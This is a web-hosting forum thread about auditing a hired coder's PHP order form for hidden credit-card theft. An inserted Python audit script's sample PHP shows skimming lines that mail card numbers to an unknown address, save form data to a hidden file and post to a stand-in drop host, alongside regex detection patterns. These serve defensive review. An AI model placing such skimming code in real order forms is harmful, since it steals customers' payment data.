  1. #1
    Join Date
    Jul 2004
    Posts
    329

    How can I guarantee a PHP coder I hired didn't create a rigged order form?

    How can I guarantee that a PHP coder I hired didn't create a rigged order form that sends him my customers' C/C details as well?

    If the order form is rigged, will the SSL notify me?

    Thanks

  2. #2
    Join Date
    Apr 2005
    Location
    Sweden
    Posts
    241
    No, it won't. The only way to make sure is to read through the source code and see for yourself, or have somebody you really trust do it for you.

  3. #3
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,080
    If it is only a single file you can probably notice anything weird in the PHP code. To be sure you should find another coder that you really trust, as posted above.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  4. #4
    Join Date
    Jul 2003
    Location
    Castle Pines, CO
    Posts
    7,189
    You should also be able to look through the processing form to see if there is an email address in there that you do not recognize.

  5. #5
    Join Date
    Jul 2004
    Posts
    329
    Thanks for the tips.

    Has anyone experienced what I am mentioning right here, or am I a bit too worried?

  6. #6
    Join Date
    Jun 2003
    Location
    San Francisco
    Posts
    623
    You should set up a development policy that he should write a mail class (for example, CEmail), and all the mails should go through this class instead of calling the PHP mail function directly.

    Then, do a search for the "mail" function and it should only occur in CEmail. For example, it is used in only one function, the SendMail() function in CEmail.

    Once that's done, everything's easy. You can make that SendMail() CC: you, or write a log.

  7. #7
    Join Date
    Apr 2005
    Location
    Sweden
    Posts
    241
    I really hope you're not going to email credit card details, even to yourself? That to me would be too reckless, since that type of communication is usually not protected well enough, and would give customers a false sense of security that their data is safe.

    Besides, there could be many other ways a coder could capture the data, like storing it in a file for later collection, sending it to another web server with an HTTP request, etc.

    Anyway, like I said, the only way to make sure is to read and understand the source code yourself, every single line, or have someone else do it for you.
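    The policy in #6 (one mail wrapper, then grep for everything else) and the other data paths listed in #7 (file writes, outbound HTTP) can be turned into a first-pass audit script. The following is an added example, not code from anyone in this thread; the PHP files, the wrapper name CEmail.php and the trusted domain are constructed, and every hit is meant to be read by a human, not treated as proof either way.

```python
import re

# Constructed PHP sources standing in for a hired-out order form (not real code).
# Thread's policy: every mail goes through the CEmail wrapper, so a mail() call
# anywhere else, an unknown address, a file write or an outbound HTTP call is a finding.
CONSTRUCTED_FILES = {
    "CEmail.php": """<?php
class CEmail {
    public function SendMail($to, $subj, $body) {
        error_log("mail to $to");        // the wrapper keeps its own log
        return mail($to, $subj, $body);  // the one permitted mail() call
    }
}""",
    "order.php": """<?php
$m = new CEmail();
$m->SendMail('orders@example-shop.test', 'New order', $body);
mail('collector@unknown-host.example', 'cc', $_POST['cc_number']);
file_put_contents('/tmp/.cards', serialize($_POST), FILE_APPEND);
$ch = curl_init('http://203.0.113.5/drop.php');
curl_exec($ch);
""",
}
APPROVED_MAIL_FILE = "CEmail.php"          # assumed name of the wrapper file
TRUSTED_DOMAINS = {"example-shop.test"}   # assumed domain of the shop's own mailboxes

# One regex per data path named in the thread: mail, file storage, outbound HTTP.
PATTERNS = {
    "direct_mail": re.compile(r"\bmail\s*\("),
    "file_write": re.compile(r"\b(file_put_contents|fwrite|fopen)\s*\("),
    "outbound_http": re.compile(r"\b(curl_init|curl_exec|fsockopen|file_get_contents)\s*\("),
}
EMAIL_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")

def audit(files, approved_mail_file=APPROVED_MAIL_FILE, trusted=TRUSTED_DOMAINS):
    """Return (file, line_no, finding) tuples that a reviewer should read by hand."""
    findings = []
    for name, src in files.items():
        for no, line in enumerate(src.splitlines(), 1):
            for label, pat in PATTERNS.items():
                if label == "direct_mail" and name == approved_mail_file:
                    continue  # mail() is allowed inside the wrapper only
                if pat.search(line):
                    findings.append((name, no, label))
            for m in EMAIL_RE.finditer(line):  # post #4: addresses you don't recognise
                if m.group(1).lower() not in trusted:
                    findings.append((name, no, "unknown_address:" + m.group(0)))
    return findings

if __name__ == "__main__":
    for f in audit(CONSTRUCTED_FILES):
        print("%s:%d %s" % f)
```

    On the constructed input the wrapper file comes back clean and order.php yields five findings, each pointing at one line to read.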

  8. #8
    Join Date
    Jul 2001
    Location
    Canada
    Posts
    1,284
    As previous comments have pointed to a solution, I guess the question that pops into my mind is that if you don't trust the programmer, why did you hire them in the first place?
    "Obsolesence is just a lack of imagination."

  9. #9
    Join Date
    Mar 2004
    Posts
    1,301
    Originally posted by NyteOwl
    As previous comments have pointed to a solution, I guess the question that pops into my mind is that if you don't trust the programmer, why did you hire them in the first place?
    It's because there are many pretenders in this world. They sound very nice at first, but turn out to be ... who-knows-what, so precaution is a good thing.

  10. #10
    Join Date
    May 2001
    Location
    Dayton, Ohio
    Posts
    4,962

    Re: How can I guarantee a PHP coder I hired didn't create a rigged order form?

    Originally posted by joephill
    How can I guarantee that a PHP coder I hired didn't create a rigged order form that sends him my customers' C/C details as well?

    If the order form is rigged, will the SSL notify me?

    Thanks

    You can normally contact another developer or development firm to audit the code. They could point out if the project has any call backs along with any other kind of exploits.

    -Mat
    -Mat Sumpter
    Director, Product Engagement
    Penton Media
